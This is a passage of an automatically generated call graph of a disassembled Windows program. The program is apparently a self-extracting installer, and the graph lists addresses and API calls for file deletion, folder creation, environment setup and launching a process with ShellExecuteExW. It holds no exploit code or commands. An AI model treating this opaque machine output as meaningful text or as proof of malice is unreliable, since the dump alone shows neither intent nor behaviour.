8434->8348 8434->8349 8435->8423 8507 40ed79 8435->8507 8438 401340 8437->8438 8439 40112b 2 API calls 8438->8439 8440 40134b 8439->8440 8440->8357 8442 4012f7 2 API calls 8441->8442 8443 401462 8442->8443 8530 4013e2 8443->8530 8445 40146d 8445->8361 8447 403037 8446->8447 8453 401804 8446->8453 8448 403048 8447->8448 8449 40303b SetLastError 8447->8449 8450 403051 8448->8450 8452 40305f FindFirstFileW 8448->8452 8448->8453 8449->8453 8533 402fed 8450->8533 8452->8450 8454 403072 FindClose CompareFileTime 8452->8454 8453->8384 8453->8385 8453->8386 8454->8450 8454->8453 8456 40ec65 8455->8456 8457 40ec86 VariantClear 8456->8457 8458 40ec9d 8456->8458 8457->8352 8458->8352 8460 4024fc 2 API calls 8459->8460 8461 403375 8460->8461 8462 40112b 2 API calls 8461->8462 8465 403385 8461->8465 8462->8465 8464 4033d3 GetSystemTimeAsFileTime GetFileAttributesW 8466 4033e8 8464->8466 8467 4033f2 8464->8467 8465->8464 8474 403477 8465->8474 8574 401986 CreateDirectoryW 8465->8574 8468 40301a 22 API calls 8466->8468 8469 401986 4 API calls 8467->8469 8479 4033f8 ??3@YAXPAX 8467->8479 8468->8467 8482 403405 8469->8482 8470 4034a7 8471 407776 55 API calls 8470->8471 8477 4034b1 ??3@YAXPAX 8471->8477 8472 40340a 8580 407776 8472->8580 8474->8470 8474->8479 8475 40346b ??3@YAXPAX 8480 4034bc 8475->8480 8476 40341d memcpy 8476->8482 8477->8480 8479->8480 8480->8382 8481 401986 4 API calls 8481->8482 8482->8472 8482->8475 8482->8476 8482->8481 8599 40db3c 8483->8599 8487 40112b 2 API calls 8486->8487 8488 401311 8487->8488 8488->8395 8490 4012f7 2 API calls 8489->8490 8491 40e6a9 8490->8491 8491->8426 8519 40ecd7 8492->8519 8495 40ed12 8496 40a726 ??3@YAXPAX 8495->8496 8497 40ed17 _CxxThrowException 8495->8497 8496->8423 8497->8496 8522 40ec65 8498->8522 8500 40ecba 8501 40a7b2 8500->8501 8502 40ecbe memcpy 8500->8502 8501->8433 8502->8501 8504 40ed62 8503->8504 8505 40ed67 8503->8505 8506 40ecd7 VariantClear 8504->8506 8505->8423 8506->8505 8508 40ed82 8507->8508 8509 40ed87 8507->8509 8510 40ecd7 VariantClear 8508->8510 8509->8423 8510->8509 8512 40ed42 8511->8512 8513 40ed3d 8511->8513 8512->8423 8514 40ecd7 VariantClear 8513->8514 8514->8512 8516 40a3c2 8515->8516 8517 40a3de 8516->8517 8526 40eda0 8516->8526 8517->8423 8520 40eca9 VariantClear 8519->8520 8521 40ecdf SysAllocString 8520->8521 8521->8495 8521->8496 8523 40ec6d 8522->8523 8524 40ec86 VariantClear 8523->8524 8525 40ec9d 8523->8525 8524->8500 8525->8500 8527 40edae 8526->8527 8528 40eda9 8526->8528 8527->8517 8529 40ecd7 VariantClear 8528->8529 8529->8527 8531 401398 2 API calls 8530->8531 8532 4013f2 8531->8532 8532->8445 8539 402c86 8533->8539 8535 402ff6 8536 403017 8535->8536 8537 402ffb GetLastError 8535->8537 8536->8453 8538 403006 8537->8538 8538->8453 8540 402c93 GetFileAttributesW 8539->8540 8541 402c8f 8539->8541 8542 402ca4 8540->8542 8543 402ca9 8540->8543 8541->8535 8542->8535 8544 402cc7 8543->8544 8545 402cad SetFileAttributesW 8543->8545 8550 402b79 8544->8550 8547 402cc3 8545->8547 8548 402cba DeleteFileW 8545->8548 8547->8535 8548->8535 8551 4024fc 2 API calls 8550->8551 8552 402b90 8551->8552 8553 40254d 2 API calls 8552->8553 8554 402b9d FindFirstFileW 8553->8554 8555 402c55 SetFileAttributesW 8554->8555 8570 402bbf 8554->8570 8557 402c60 RemoveDirectoryW 8555->8557 8558 402c78 ??3@YAXPAX 8555->8558 8556 401329 2 API calls 8556->8570 8557->8558 8559 402c6d ??3@YAXPAX 8557->8559 8560 402c80 8558->8560 8559->8560 8560->8535 8562 40254d 2 API calls 8562->8570 8563 402c24 SetFileAttributesW 8563->8558 8567 402c2d DeleteFileW 8563->8567 8564 402bef lstrcmpW 8565 402c05 lstrcmpW 8564->8565 8566 402c38 FindNextFileW 8564->8566 8565->8566 8565->8570 8568 402c4e FindClose 8566->8568 8566->8570 8567->8570 8568->8555 8569 402b79 2 API calls 8569->8570 8570->8556 8570->8558 8570->8562 8570->8563 8570->8564 8570->8566 8570->8569 8571 401429 8570->8571 8572 401398 2 API calls 8571->8572 8573 401433 8572->8573 8573->8570 8575 4019c7 8574->8575 8576 401997 GetLastError 8574->8576 8575->8465 8577 4019b1 GetFileAttributesW 8576->8577 8579 4019a6 8576->8579 8577->8575 8577->8579 8578 4019a7 SetLastError 8578->8465 8579->8575 8579->8578 8581 401f9d 19 API calls 8580->8581 8582 40778a wvsprintfW 8581->8582 8583 407859 8582->8583 8584 4077ab GetLastError FormatMessageW 8582->8584 8587 4076a8 25 API calls 8583->8587 8585 4077d9 FormatMessageW 8584->8585 8586 4077ee lstrlenW lstrlenW ??2@YAPAXI lstrcpyW lstrcpyW 8584->8586 8585->8583 8585->8586 8591 4076a8 8586->8591 8590 407865 8587->8590 8590->8479 8592 407715 ??3@YAXPAX LocalFree 8591->8592 8593 4076b7 8591->8593 8592->8590 8594 40661a 2 API calls 8593->8594 8595 4076c6 IsWindow 8594->8595 8596 4076ef 8595->8596 8597 4076dd IsBadReadPtr 8595->8597 8598 4073d1 21 API calls 8596->8598 8597->8596 8598->8592 8600 40db1f 2 API calls 8599->8600 8601 401857 8600->8601 8601->8390 8601->8391 8607 40d985 8602->8607 8605 40da65 CreateFileW 8606 40da8a 8605->8606 8606->8342 8608 40d98f CloseHandle 8607->8608 8609 40d99a 8607->8609 8608->8609 8609->8605 8609->8606 8611 40af0c 8610->8611 8626 408ebd 8610->8626 8611->8626 8701 40ac7a 8611->8701 8613 40af3f 8614 40ac7a 7 API calls 8613->8614 8615 40b0cb 8613->8615 8619 40af96 8614->8619 8617 40e959 ctype 4 API calls 8615->8617 8616 40afbd 8708 40e959 8616->8708 8617->8626 8619->8615 8619->8616 8620 40b043 8621 40e959 ctype 4 API calls 8620->8621 8624 40b07f 8621->8624 8622 408761 _CxxThrowException ??2@YAPAXI memcpy ??3@YAXPAX 8623 40afc6 8622->8623 8623->8620 8623->8622 8625 40e959 ctype 4 API calls 8624->8625 8625->8626 8626->8290 8627 4065ea InitializeCriticalSection 8626->8627 8627->8302 8720 4086f0 8628->8720 8672 40cdc7 8671->8672 8673 408761 4 API calls 8672->8673 8674 40cdde 8673->8674 8674->8302 8702 40e8da ctype 3 API calls 8701->8702 8703 40ac86 8702->8703 8712 40e811 8703->8712 8705 40aca2 8705->8613 8706 409403 4 API calls 8707 40ac90 8706->8707 8707->8705 8707->8706 8709 40e93b 8708->8709 8710 40e8da ctype 3 API calls 8709->8710 8711 40e943 ??3@YAXPAX 8710->8711 8711->8623 8713 40e8a5 8712->8713 8714 40e824 8712->8714 8713->8707 8715 40e833 _CxxThrowException 8714->8715 8716 40e863 ??2@YAPAXI 8714->8716 8717 40e895 ??3@YAXPAX 8714->8717 8715->8714 8716->8714 8718 40e879 memcpy 8716->8718 8717->8713 8718->8717 8721 40e8da ctype 3 API calls 8720->8721 8722 4086f8 8721->8722 8723 40e8da ctype 3 API calls 8722->8723 8724 408700 8723->8724 8725 40e8da ctype 3 API calls 8724->8725 8726 408708 8725->8726 9015 40dace 9018 40daac 9015->9018 9021 40da8f 9018->9021 9022 40da56 2 API calls 9021->9022 9023 40daa9 9022->9023 9005 40dadc ReadFile 9024 411def __set_app_type __p__fmode __p__commode 9025 411e5e 9024->9025 9026 411e72 9025->9026 9027 411e66 __setusermatherr 9025->9027 9036 411f66 _controlfp 9026->9036 9027->9026 9029 411e77 _initterm __getmainargs _initterm 9030 411ecb GetStartupInfoA 9029->9030 9032 411eff GetModuleHandleA 9030->9032 9037 4064af _EH_prolog 9032->9037 9036->9029 9040 404faa 9037->9040 9345 401b37 GetModuleHandleW CreateWindowExW 9040->9345 9043 404fdc 9044 40648e MessageBoxA 9043->9044 9046 404ff6 9043->9046 9045 4064a5 exit _XcptFilter 9044->9045 9047 401411 2 API calls 9046->9047 9048 40502d 9047->9048 9049 401411 2 API calls 9048->9049 9050 405035 9049->9050 9348 403e23 9050->9348 9055 40254d 2 API calls 9056 405073 9055->9056 9357 402a69 9056->9357 9058 40507c 9371 403d71 9058->9371 9061 40509b _wtol 9063 4050b1 9061->9063 9376 404405 9063->9376 9064 4050d6 9065 403d71 6 API calls 9064->9065 9066 4050e1 9065->9066 9067 4050e7 9066->9067 9068 405118 9066->9068 9533 404996 9067->9533 9069 405130 GetModuleFileNameW 9068->9069 9071 40112b 2 API calls 9068->9071 9072 405151 9069->9072 9073 405142 9069->9073 9071->9069 9078 403d71 6 API calls 9072->9078 9075 407776 55 API calls 9073->9075 9074 4050ee ??3@YAXPAX 9551 403e70 9074->9551 9083 4050ec 9075->9083 9077 4050ff ??3@YAXPAX ??3@YAXPAX 9077->9045 9090 405173 9078->9090 9079 4052d5 9080 401362 2 API calls 9079->9080 9081 4052e5 9080->9081 9082 401362 2 API calls 9081->9082 9087 4052f2 9082->9087 9083->9074 9084 4051fa 9084->9083 9085 40522a 9084->9085 9089 405213 _wtol 9084->9089 9086 403d71 6 API calls 9085->9086 9095 405289 9086->9095 9088 40538d ??2@YAPAXI 9087->9088 9091 401329 2 API calls 9087->9091 9097 405399 9088->9097 9089->9085 9090->9079 9090->9083 9090->9084 9090->9085 9094 401429 2 API calls 9090->9094 9092 405327 9091->9092 9093 401329 2 API calls 9092->9093 9099 40533d 9093->9099 9094->9090 9095->9079 9096 404594 2 API calls 9095->9096 9098 4052ba 9096->9098 9100 4053cf 9097->9100 9104 407776 55 API calls 9097->9104 9098->9079 9102 401362 2 API calls 9098->9102 9103 401362 2 API calls 9099->9103 9401 4025ae 9100->9401 9102->9079 9106 405367 9103->9106 9104->9100 9108 401f9d 19 API calls 9106->9108 9107 4025ae 2 API calls 9110 4053f6 9107->9110 9109 40536e 9108->9109 9111 40254d 2 API calls 9109->9111 9112 4025ae 2 API calls 9110->9112 9113 405377 9111->9113 9114 4053fe 9112->9114 9113->9088 9404 404e3f 9114->9404 9119 40546f 9121 405534 9119->9121 9124 403d71 6 API calls 9119->9124 9120 402844 10 API calls 9122 405441 9120->9122 9123 40e8da ctype 3 API calls 9121->9123 9122->9119 9127 407776 55 API calls 9122->9127 9125 40553c 9123->9125 9126 405493 9124->9126 9128 405573 9125->9128 9582 403093 9125->9582 9126->9121 9134 40549d 9126->9134 9129 405450 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9127->9129 9131 405506 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9128->9131 9132 40557c 9128->9132 9129->9119 9131->9074 9131->9083 9136 405588 wsprintfW 9132->9136 9137 4055ed 9132->9137 9143 401411 2 API calls 9132->9143 9144 401329 ??2@YAPAXI ??3@YAXPAX 9132->9144 9147 401f9d 19 API calls 9132->9147 9616 402f6c ??2@YAPAXI 9132->9616 9622 402425 ??3@YAXPAX ??3@YAXPAX 9132->9622 9134->9131 9556 404cbc 9134->9556 9135 405556 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9138 4054f5 9135->9138 9139 401411 2 API calls 9136->9139 9432 404603 9137->9432 9138->9131 9139->9132 9142 4054cc 9142->9131 9145 407776 55 API calls 9142->9145 9143->9132 9144->9132 9146 4054da ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9145->9146 9146->9138 9147->9132 9148 40584a 9149 404603 26 API calls 9148->9149 9182 40586a 9149->9182 9151 403b94 lstrlenW lstrlenW _wcsnicmp 9176 4055f6 9151->9176 9154 405933 9494 404034 9154->9494 9155 4024fc 2 API calls 9155->9182 9159 4059d8 CoInitialize 9166 40243b lstrcmpW 9159->9166 9160 40595a 9163 40243b lstrcmpW 9160->9163 9161 405935 ??3@YAXPAX 9161->9154 9165 405969 9163->9165 9164 401411 ??2@YAPAXI ??3@YAXPAX 9164->9182 9167 405979 9165->9167 9169 401f9d 19 API calls 9165->9169 9168 4059fe 9166->9168 9649 403b40 9167->9649 9170 405a12 9168->9170 9173 401329 2 API calls 9168->9173 9169->9167 9500 403b59 9170->9500 9172 401362 2 API calls 9172->9182 9173->9170 9176->9148 9176->9151 9192 4057dd _wtol 9176->9192 9208 405878 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9176->9208 9623 40484d 9176->9623 9634 40408b 9176->9634 9178 4073d1 21 API calls 9181 40599c ctype 9178->9181 9179 401329 2 API calls 9179->9182 9180 405a4d 9184 405a2b ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9180->9184 9222 405a61 9180->9222 9669 4082e9 9180->9669 9185 4059a7 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9181->9185 9182->9154 9182->9155 9182->9161 9182->9164 9182->9172 9182->9179 9187 402f6c 7 API calls 9182->9187 9491 40243b 9182->9491 9648 402425 ??3@YAXPAX ??3@YAXPAX 9182->9648 9184->9180 9185->9083 9187->9182 9189 405910 ??3@YAXPAX 9189->9182 9190 401411 2 API calls 9190->9222 9192->9176 9193 405bd8 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9213 405bf3 9193->9213 9194 405a9f GetKeyState 9194->9222 9195 405c6c 9197 405ca2 9195->9197 9198 405c74 9195->9198 9196 40243b lstrcmpW 9196->9222 9201 4012f7 2 API calls 9197->9201 9711 403f85 9198->9711 9202 405cb0 9201->9202 9205 403b59 15 API calls 9202->9205 9209 405cb9 9205->9209 9206 407776 55 API calls 9210 405c13 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9206->9210 9207 401362 2 API calls 9211 405c91 ??3@YAXPAX 9207->9211 9208->9083 9212 405cca ??3@YAXPAX 9209->9212 9216 401362 2 API calls 9209->9216 9210->9213 9217 405cd9 9211->9217 9212->9217 9213->9206 9214 405c4a ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9213->9214 9214->9213 9215 405bcd ??3@YAXPAX 9215->9222 9216->9212 9219 405d24 9217->9219 9220 405d16 9217->9220 9218 401329 ??2@YAPAXI ??3@YAXPAX 9218->9222 9724 40786b 9219->9724 9507 404a44 9220->9507 9222->9190 9222->9193 9222->9194 9222->9195 9222->9196 9222->9213 9222->9214 9222->9215 9222->9218 9224 401429 ??2@YAPAXI ??3@YAXPAX 9222->9224 9696 407613 9222->9696 9705 407674 9222->9705 9224->9222 9225 405d20 9226 405d65 9225->9226 9730 403e0d 9225->9730 9227 404034 21 API calls 9226->9227 9229 405d77 9227->9229 9231 401411 2 API calls 9229->9231 9232 406373 9229->9232 9233 405d95 9231->9233 9234 4063f7 ctype 9232->9234 9237 40243b lstrcmpW 9232->9237 9277 405da8 9233->9277 9734 40453e 9233->9734 9236 40643a ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9234->9236 9242 40243b lstrcmpW 9234->9242 9239 406461 9236->9239 9240 406467 ??3@YAXPAX 9236->9240 9238 4063a4 9237->9238 9238->9234 9761 403f48 9238->9761 9239->9240 9241 403e70 ctype 4 API calls 9240->9241 9243 406478 ??3@YAXPAX ??3@YAXPAX 9241->9243 9245 406416 9242->9245 9243->9045 9244 401411 ??2@YAPAXI ??3@YAXPAX 9244->9277 9245->9236 9249 406423 9245->9249 9248 405dd8 9252 405de5 9248->9252 9253 4061fa ??3@YAXPAX ??3@YAXPAX 9248->9253 9250 4012f7 2 API calls 9249->9250 9255 406432 9250->9255 9251 4073d1 21 API calls 9256 4063e0 ??3@YAXPAX 9251->9256 9743 4043c6 9252->9743 9257 406312 9253->9257 9254 40243b lstrcmpW 9254->9277 9766 404aff 9255->9766 9256->9234 9260 40636a ??3@YAXPAX 9257->9260 9263 404034 21 API calls 9257->9263 9259 405e45 9265 401329 2 API calls 9259->9265 9260->9232 9268 406321 9263->9268 9269 405e4e 9265->9269 9266 4043c6 2 API calls 9267 405e0e 9266->9267 9270 401362 2 API calls 9267->9270 9751 4048ab 9268->9751 9274 403b7f 19 API calls 9269->9274 9275 405e1a ??3@YAXPAX ??3@YAXPAX GetFileAttributesW 9270->9275 9272 40626b ??3@YAXPAX ??3@YAXPAX 9272->9257 9273 401329 2 API calls 9273->9277 9290 405e57 9274->9290 9278 406211 9275->9278 9279 405e41 9275->9279 9276 40633a SetCurrentDirectoryW 9280 4048ab 4 API calls 9276->9280 9277->9244 9277->9248 9277->9254 9277->9259 9277->9272 9277->9273 9281 401429 2 API calls 9277->9281 9284 403e0d 16 API calls 9278->9284 9279->9259 9282 406362 9280->9282 9283 405ee5 ??3@YAXPAX ??3@YAXPAX 9281->9283 9285 403e0d 16 API calls 9282->9285 9283->9277 9286 406216 9284->9286 9285->9260 9287 407776 55 API calls 9286->9287 9288 40621f 7 API calls 9287->9288 9289 40625e 9288->9289 9289->9272 9291 405f61 _wtol 9290->9291 9292 403bce lstrlenW lstrlenW _wcsnicmp 9290->9292 9293 406025 9290->9293 9291->9290 9292->9290 9294 406080 9293->9294 9295 40602e 9293->9295 9296 401362 2 API calls 9294->9296 9297 406053 9295->9297 9298 406034 9295->9298 9299 40607e 9296->9299 9301 401329 2 API calls 9297->9301 9300 401329 2 API calls 9298->9300 9302 40254d 2 API calls 9299->9302 9303 40603f 9300->9303 9304 406051 9301->9304 9305 406092 9302->9305 9306 40254d 2 API calls 9303->9306 9307 40243b lstrcmpW 9304->9307 9308 401411 2 API calls 9305->9308 9309 406048 9306->9309 9310 406068 9307->9310 9311 40609a 9308->9311 9312 40254d 2 API calls 9309->9312 9310->9305 9314 40254d 2 API calls 9310->9314 9313 401411 2 API calls 9311->9313 9312->9304 9315 4060a2 memset 9313->9315 9314->9299 9316 4060e1 9315->9316 9317 404594 2 API calls 9316->9317 9318 4060fe 9317->9318 9319 401329 2 API calls 9318->9319 9320 406109 9319->9320 9321 403b7f 19 API calls 9320->9321 9322 406112 9321->9322 9323 4061b1 9322->9323 9527 4021ed 9322->9527 9325 4062ee ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9323->9325 9327 4061c5 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9323->9327 9325->9257 9327->9253 9328 406150 9330 403b7f 19 API calls 9328->9330 9329 401429 2 API calls 9331 406147 9329->9331 9332 406168 ShellExecuteExW 9330->9332 9334 40254d 2 API calls 9331->9334 9335 406282 9332->9335 9336 40618c 9332->9336 9334->9328 9339 407776 55 API calls 9335->9339 9337 4061a0 CloseHandle 9336->9337 9338 406192 WaitForSingleObject 9336->9338 9748 402185 9337->9748 9338->9337 9341 40628c 9339->9341 9342 403e0d 16 API calls 9341->9342 9343 406291 9 API calls 9342->9343 9344 4062e1 9343->9344 9344->9325 9346 401b6c SetTimer GetMessageW DispatchMessageW KillTimer KiUserCallbackDispatcher 9345->9346 9347 401b9f GetVersionExW 9345->9347 9346->9347 9347->9043 9347->9044 9349 40112b 2 API calls 9348->9349 9350 403e38 GetCommandLineW 9349->9350 9351 404594 9350->9351 9352 4045ce 9351->9352 9355 4045a2 9351->9355 9354 401429 2 API calls 9352->9354 9356 4045c6 9352->9356 9353 401429 2 API calls 9353->9355 9354->9352 9355->9353 9355->9356 9356->9055 9358 401411 2 API calls 9357->9358 9364 402a79 9358->9364 9359 401362 2 API calls 9360 402b6c ??3@YAXPAX 9359->9360 9360->9058 9361 402b5f 9361->9359 9363 401411 2 API calls 9363->9364 9364->9361 9364->9363 9365 401429 ??2@YAPAXI ??3@YAXPAX 9364->9365 9367 401362 2 API calls 9364->9367 9805 4025c6 9364->9805 9808 40272e 9364->9808 9365->9364 9368 402ad9 ??3@YAXPAX 9367->9368 9369 4013e2 2 API calls 9368->9369 9370 402aee ??3@YAXPAX ??3@YAXPAX 9369->9370 9370->9364 9372 403d80 9371->9372 9373 403dbd 9372->9373 9374 403d9a lstrlenW lstrlenW 9372->9374 9373->9061 9373->9063 9819 401a85 9374->9819 9377 401f47 3 API calls 9376->9377 9378 404416 9377->9378 9379 401f9d 19 API calls 9378->9379 9380 40441d 9379->9380 9381 401f9d 19 API calls 9380->9381 9382 404429 9381->9382 9383 401f9d 19 API calls 9382->9383 9384 404435 9383->9384 9385 401f9d 19 API calls 9384->9385 9386 404441 9385->9386 9387 401f9d 19 API calls 9386->9387 9388 40444d 9387->9388 9389 401f9d 19 API calls 9388->9389 9390 404459 9389->9390 9391 401f9d 19 API calls 9390->9391 9392 404465 9391->9392 9393 404480 SHGetSpecialFolderPathW 9392->9393 9396 404533 #17 9392->9396 9397 401411 2 API calls 9392->9397 9398 401329 ??2@YAPAXI ??3@YAXPAX 9392->9398 9400 402f6c 7 API calls 9392->9400 9824 402425 ??3@YAXPAX ??3@YAXPAX 9392->9824 9393->9392 9394 40449a wsprintfW 9393->9394 9395 401411 2 API calls 9394->9395 9395->9392 9396->9064 9397->9392 9398->9392 9400->9392 9402 4022b0 2 API calls 9401->9402 9403 4025c2 9402->9403 9403->9107 9825 403e86 9404->9825 9406 404e56 9407 403e86 2 API calls 9406->9407 9408 404e65 9407->9408 9829 404343 9408->9829 9412 404e82 ??3@YAXPAX 9413 404343 3 API calls 9412->9413 9414 404e9d 9413->9414 9415 403ec1 2 API calls 9414->9415 9416 404ea8 ??3@YAXPAX wsprintfA 9415->9416 9845 403ef6 9416->9845 9418 404ed0 9419 403ef6 2 API calls 9418->9419 9420 404edb 9419->9420 9421 402844 9420->9421 9422 402851 9421->9422 9430 40dcfb 3 API calls 9422->9430 9423 402863 lstrlenA lstrlenA 9428 402890 9423->9428 9424 40296e 9424->9119 9424->9120 9425 40293b memmove 9425->9424 9425->9428 9426 4028db memcmp 9426->9424 9426->9428 9427 402918 memcmp 9427->9428 9428->9424 9428->9425 9428->9426 9428->9427 9431 40dcc7 GetLastError 9428->9431 9856 402640 9428->9856 9430->9423 9431->9428 9433 40243b lstrcmpW 9432->9433 9434 40461c 9433->9434 9435 40466c 9434->9435 9437 401329 2 API calls 9434->9437 9436 40243b lstrcmpW 9435->9436 9438 40468a 9436->9438 9439 404633 9437->9439 9442 40243b lstrcmpW 9438->9442 9440 401f9d 19 API calls 9439->9440 9441 40463a 9440->9441 9444 40254d 2 API calls 9441->9444 9443 4046a2 9442->9443 9446 40243b lstrcmpW 9443->9446 9445 404643 9444->9445 9447 401329 2 API calls 9445->9447 9448 4046ba 9446->9448 9449 40465c 9447->9449 9451 40243b lstrcmpW 9448->9451 9450 401f9d 19 API calls 9449->9450 9452 404663 9450->9452 9453 4046d2 9451->9453 9454 40254d 2 API calls 9452->9454 9455 4046e9 9453->9455 9456 4046d9 lstrcmpiW 9453->9456 9454->9435 9457 40243b lstrcmpW 9455->9457 9456->9455 9458 4046ff 9457->9458 9459 40243b lstrcmpW 9458->9459 9460 40472c 9459->9460 9461 404739 9460->9461 9859 403d1f 9460->9859 9463 40243b lstrcmpW 9461->9463 9467 40474d 9463->9467 9464 40476d 9465 40243b lstrcmpW 9464->9465 9472 404780 9465->9472 9467->9464 9468 40243b lstrcmpW 9467->9468 9863 403cc6 9467->9863 9468->9467 9469 4047a0 9471 40243b lstrcmpW 9469->9471 9473 4047ac 9471->9473 9472->9469 9474 40243b lstrcmpW 9472->9474 9867 403cf7 9472->9867 9475 40243b lstrcmpW 9473->9475 9474->9472 9476 4047bd 9475->9476 9477 40243b lstrcmpW 9476->9477 9478 4047ce 9477->9478 9479 4047e4 9478->9479 9480 4047db _wtol 9478->9480 9481 40243b lstrcmpW 9479->9481 9480->9479 9482 4047f0 9481->9482 9483 404800 9482->9483 9484 4047f7 _wtol 9482->9484 9485 40243b lstrcmpW 9483->9485 9484->9483 9486 40480c 9485->9486 9487 40243b lstrcmpW 9486->9487 9488 404824 9487->9488 9489 40243b lstrcmpW 9488->9489 9490 40483c 9489->9490 9490->9176 9875 4023dd 9491->9875 9495 404045 9494->9495 9496 404088 9494->9496 9497 4012f7 2 API calls 9495->9497 9498 403b7f 19 API calls 9495->9498 9496->9159 9496->9160 9497->9495 9499 404062 SetEnvironmentVariableW ??3@YAXPAX 9498->9499 9499->9495 9499->9496 9501 40393b 7 API calls 9500->9501 9502 403b69 9501->9502 9503 4039f6 7 API calls 9502->9503 9504 403b74 9503->9504 9505 4027c7 6 API calls 9504->9505 9506 403b7a 9505->9506 9506->9180 9652 4083b6 9506->9652 9879 408676 9507->9879 9509 404a55 ??2@YAPAXI 9510 404a64 9509->9510 9524 40dcfb 3 API calls 9510->9524 9511 404a85 9881 40b2fc 9511->9881 9887 40a7de _EH_prolog 9511->9887 9512 404a95 9513 404ab3 9512->9513 9514 404a99 9512->9514 9516 404ada ??2@YAPAXI 9513->9516 9519 403354 86 API calls 9513->9519 9515 407776 55 API calls 9514->9515 9523 404aa1 9515->9523 9517 404ae6 9516->9517 9518 404aed 9516->9518 9922 404292 9517->9922 9903 40150b 9518->9903 9521 404ac6 9519->9521 9521->9516 9521->9523 9523->9225 9524->9511 9528 402200 LoadLibraryA GetProcAddress 9527->9528 9529 4021fb 9527->9529 9530 40221b 9528->9530 9531 402223 9528->9531 9529->9323 9529->9328 9529->9329 9530->9529 9531->9530 10385 4021b9 LoadLibraryA GetProcAddress 9531->10385 9534 40661a 2 API calls 9533->9534 9535 4049af 9534->9535 9536 401f9d 19 API calls 9535->9536 9537 4049bd 9536->9537 9538 4024fc 2 API calls 9537->9538 9539 4049c7 9538->9539 9540 4049fd 9539->9540 9542 40254d ??2@YAPAXI ??3@YAXPAX 9539->9542 9541 40254d 2 API calls 9540->9541 9543 404a0a 9541->9543 9542->9539 9544 401f9d 19 API calls 9543->9544 9545 404a11 9544->9545 9546 40254d 2 API calls 9545->9546 9547 404a1b 9546->9547 9548 4073d1 21 API calls 9547->9548 9549 404a30 ??3@YAXPAX 9548->9549 9550 404a41 ctype 9549->9550 9550->9083 9552 40e8da ctype 3 API calls 9551->9552 9553 403e7e 9552->9553 9554 40e8da ctype 3 API calls 9553->9554 9555 40e943 ??3@YAXPAX 9554->9555 9555->9077 9557 40db53 2 API calls 9556->9557 9558 404ce8 9557->9558 9559 404d44 9558->9559 9561 4024fc 2 API calls 9558->9561 9560 4025ae 2 API calls 9559->9560 9562 404d4c 9560->9562 9563 404cf7 9561->9563 9564 403e86 2 API calls 9562->9564 9567 404db5 ??3@YAXPAX 9563->9567 9569 403354 86 API calls 9563->9569 9565 404d59 9564->9565 9566 403ef6 2 API calls 9565->9566 9568 404d66 9566->9568 9581 404db1 9567->9581 9570 403ef6 2 API calls 9568->9570 9571 404d1b 9569->9571 9572 404d73 9570->9572 9571->9567 9574 40db53 2 API calls 9571->9574 9573 403ef6 2 API calls 9572->9573 9575 404d80 9573->9575 9576 404d37 9574->9576 9577 40dd5f 2 API calls 9575->9577 9576->9567 9578 404d3b ??3@YAXPAX 9576->9578 9579 404d94 9577->9579 9578->9559 9579->9567 9580 404d9d ??3@YAXPAX 9579->9580 9580->9581 9581->9142 9583 4025ae 2 API calls 9582->9583 9599 4030a8 9583->9599 9584 403301 9585 403344 ??3@YAXPAX 9584->9585 9586 40334e 9585->9586 9586->9128 9586->9135 9587 401411 ??2@YAPAXI ??3@YAXPAX 9587->9599 9589 40272e ??2@YAPAXI ??3@YAXPAX MultiByteToWideChar 9589->9599 9590 401362 2 API calls 9591 4030f3 ??3@YAXPAX ??3@YAXPAX 9590->9591 9592 403303 9591->9592 9591->9599 10393 4029c3 9592->10393 9596 40331c ??3@YAXPAX 9596->9586 9597 4031e5 strncmp 9598 4031d0 strncmp 9597->9598 9597->9599 9598->9597 9598->9599 9599->9584 9599->9587 9599->9589 9599->9590 9599->9592 9599->9597 9600 401362 2 API calls 9599->9600 9601 402640 2 API calls 9599->9601 9604 402640 ??2@YAPAXI ??3@YAXPAX 9599->9604 9606 4023dd lstrcmpW 9599->9606 9607 402f6c 7 API calls 9599->9607 9609 403330 9599->9609 9610 4032b2 lstrcmpW 9599->9610 9614 401329 2 API calls 9599->9614 10387 402986 9599->10387 10392 402425 ??3@YAXPAX ??3@YAXPAX 9599->10392 9602 403252 ??3@YAXPAX 9600->9602 9601->9598 9603 402a69 9 API calls 9602->9603 9605 403263 lstrcmpW 9603->9605 9604->9599 9605->9599 9606->9599 9607->9599 9612 402f6c 7 API calls 9609->9612 9610->9599 9611 4032c0 lstrcmpW 9610->9611 9611->9599 9613 40333c 9612->9613 10411 402425 ??3@YAXPAX ??3@YAXPAX 9613->10411 9614->9599 9617 402f86 9616->9617 9618 402f7b 9616->9618 9620 408761 4 API calls 9617->9620 10413 402668 9618->10413 9621 402f92 9620->9621 9621->9132 9622->9132 9624 4024fc 2 API calls 9623->9624 9625 40485f 9624->9625 9626 40254d 2 API calls 9625->9626 9627 40486c 9626->9627 9628 404888 9627->9628 9629 401429 2 API calls 9627->9629 9630 40254d 2 API calls 9628->9630 9629->9627 9631 404892 9630->9631 9632 40408b 94 API calls 9631->9632 9633 40489d ??3@YAXPAX 9632->9633 9633->9176 9635 4040a2 lstrlenW 9634->9635 9636 4040ce 9634->9636 9637 401a85 4 API calls 9635->9637 9636->9176 9638 4040b8 9637->9638 9638->9635 9638->9636 9639 4040d5 9638->9639 9640 4024fc 2 API calls 9639->9640 9643 4040de 9640->9643 10418 402776 9643->10418 9644 403093 84 API calls 9645 40414c 9644->9645 9646 404156 ??3@YAXPAX ??3@YAXPAX 9645->9646 9647 40416d ??3@YAXPAX ??3@YAXPAX 9645->9647 9646->9636 9647->9636 9648->9189 9650 40661a 2 API calls 9649->9650 9651 403b48 9650->9651 9651->9178 9653 408646 9652->9653 9665 4083d5 ctype 9652->9665 9653->9184 9654 40661a 2 API calls 9654->9665 9655 40786b 23 API calls 9655->9665 9656 40243b 